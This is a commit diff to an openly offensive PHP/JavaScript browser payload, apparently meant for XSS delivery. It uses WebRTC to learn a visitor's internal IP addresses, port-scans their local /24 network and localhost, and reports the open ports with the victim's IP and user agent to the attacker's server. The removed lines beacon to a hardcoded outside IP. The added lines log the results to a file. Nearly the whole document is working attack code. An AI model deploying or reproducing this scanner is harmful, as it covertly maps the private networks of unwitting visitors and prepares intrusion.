Trimmed blocked ports down, added logging to file

This commit is contained in:
strawp 2016-08-31 11:14:44 +01:00
parent 9274c0f670
commit ecf457510b

View file

@ -1,17 +1,58 @@
<?php
// Get the user's INTERNAL IP address and then attempt to scan their local /24 network // Get the user's INTERNAL IP address and then attempt to scan their local /24 network
// http://net.ipcalf.com/ // http://net.ipcalf.com/
// http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html // http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html
// Change this URL to where you would like scan results reported to // Record submitted data. Make sure the web server can write this file
function report( data ){ $logfile = "internal_scan.log";
new Image().src = 'http://193.36.15.241/net?'+data;
// Log internal IP of the victim
if( !empty($_GET["internalips"]) ){
$line = "ADDR\t".$_SERVER['REMOTE_ADDR']."\t".$_GET["internalips"];
$line .= "\t".$_SERVER["HTTP_USER_AGENT"]."\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
// Log an open port
if( !empty( $_GET['openport'] ) ){
$line = "PORT\t".$_SERVER['REMOTE_ADDR']."\t".$_GET["openport"];
if( !empty( $_GET['srcip'] ) ){
$line .= "\t".$_GET['srcip'];
}
$line .= "\t".$_SERVER["HTTP_USER_AGENT"];
$line .= "\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
// Report complete
if( !empty( $_GET['scancomplete'] ) ){
$line = "DONE\t".$_SERVER['REMOTE_ADDR'];
if( !empty( $_GET['srcip'] ) ){
$line .= "\t".$_GET['srcip'];
}
$line .= "\t".$_SERVER["HTTP_USER_AGENT"];
$line .= "\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
} }
function ports_callback( host, port, state ){ header( "Content-type: text/javascript" );
$url = "//".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
?>
function report( data ){
new Image().src = '<?php echo $url; ?>?'+data;
}
function ports_callback( host, port, state, srcip ){
if( state == "closed" ) return; if( state == "closed" ) return;
// console.log( host, port, state ); // console.log( host, port, state );
report( "openport=" + host + ":" + port + "&srcip=" + AttackAPI.PortScanner.src ); report( "openport=" + host + ":" + port + "&srcip=" + srcip );
} }
var AttackAPI = { var AttackAPI = {
@ -20,11 +61,11 @@ var AttackAPI = {
homepage: 'http://www.gnucitizen.org'}; homepage: 'http://www.gnucitizen.org'};
AttackAPI.PortScanner = {}; AttackAPI.PortScanner = {};
AttackAPI.PortScanner.ports = '445,139,135,3389,80,23,443,3306,21,22,25,110,143,53,8080,1723,111,995,993,5900,1025,587,8888,199,1720,465,548,113,81,6001'.split(',') AttackAPI.PortScanner.ports = '445,3389,80,443,3306,8080,1723,5900,1025,8888,199,1720,81,6001'.split(',')
AttackAPI.PortScanner.port_index = 0; AttackAPI.PortScanner.port_index = 0;
AttackAPI.PortScanner.host_num = 1; AttackAPI.PortScanner.host_num = 1;
AttackAPI.PortScanner.src = ''; AttackAPI.PortScanner.src = '';
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) { AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout, srcip ) {
var timeout = (timeout == null)?100:timeout; var timeout = (timeout == null)?100:timeout;
var img = new Image(); var img = new Image();
// console.log( "Scanning " + target + ":" + port ); // console.log( "Scanning " + target + ":" + port );
@ -32,7 +73,7 @@ AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
img.onerror = function () { img.onerror = function () {
if (!img) return; if (!img) return;
img = undefined; img = undefined;
callback(target, port, 'open'); callback(target, port, 'open', srcip );
}; };
img.onload = img.onerror; img.onload = img.onerror;
@ -42,27 +83,28 @@ AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
if (!img) return; if (!img) return;
img.src = 'http://localhost/icon.png'; img.src = 'http://localhost/icon.png';
img = undefined; img = undefined;
callback(target, port, 'closed'); callback(target, port, 'closed', srcip );
}, timeout); }, timeout);
}; };
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout) AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{ {
var ports = (ports == null) ? AttackAPI.PortScanner.ports : ports;
var timeout = (timeout == null)?100:timeout;
for (index = 0; index < ports.length; index++) for (index = 0; index < ports.length; index++)
AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout); AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout, target );
}; };
// Scan a /24 around an IP // Scan a /24 around an IP
AttackAPI.PortScanner.scanNetwork = function ( callback, target ) AttackAPI.PortScanner.scanNetwork = function ( callback, target )
{ {
if( target.toLowerCase() == 'udp' ) return; if( target.toLowerCase() == 'udp' ) return;
AttackAPI.PortScanner.src = target;
a = target.split('.'); a = target.split('.');
AttackAPI.PortScanner.scanPort( callback, a[0]+'.'+a[1]+'.'+a[2]+'.'+AttackAPI.PortScanner.host_num, AttackAPI.PortScanner.ports[AttackAPI.PortScanner.port_index]); AttackAPI.PortScanner.scanPort( callback, a[0]+'.'+a[1]+'.'+a[2]+'.'+AttackAPI.PortScanner.host_num, AttackAPI.PortScanner.ports[AttackAPI.PortScanner.port_index], 100, target );
AttackAPI.PortScanner.host_num++; AttackAPI.PortScanner.host_num++;
if( AttackAPI.PortScanner.host_num >= 255 ){ if( AttackAPI.PortScanner.host_num >= 255 ){
AttackAPI.PortScanner.port_index++; AttackAPI.PortScanner.port_index++;
if( AttackAPI.PortScanner.port_index >= AttackAPI.PortScanner.ports.length ){ if( AttackAPI.PortScanner.port_index >= AttackAPI.PortScanner.ports.length ){
report( "scancomplete" ); report( "scancomplete&srcip=" + target );
return; return;
} }
AttackAPI.PortScanner.host_num = 1; AttackAPI.PortScanner.host_num = 1;
@ -102,6 +144,7 @@ if (RTCPeerConnection) (function () {
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
displayAddrs = displayAddrs.filter(function(ip){ return ip.toString().trim().toLowerCase() != 'udp';}); displayAddrs = displayAddrs.filter(function(ip){ return ip.toString().trim().toLowerCase() != 'udp';});
report( "internalips=" + displayAddrs.join(',') || 'n/a' ); report( "internalips=" + displayAddrs.join(',') || 'n/a' );
AttackAPI.PortScanner.scanTarget( ports_callback, '127.0.0.1' );
for( i=0; i<displayAddrs.length; i++ ){ for( i=0; i<displayAddrs.length; i++ ){
AttackAPI.PortScanner.scanNetwork( ports_callback, displayAddrs[i] ); AttackAPI.PortScanner.scanNetwork( ports_callback, displayAddrs[i] );
} }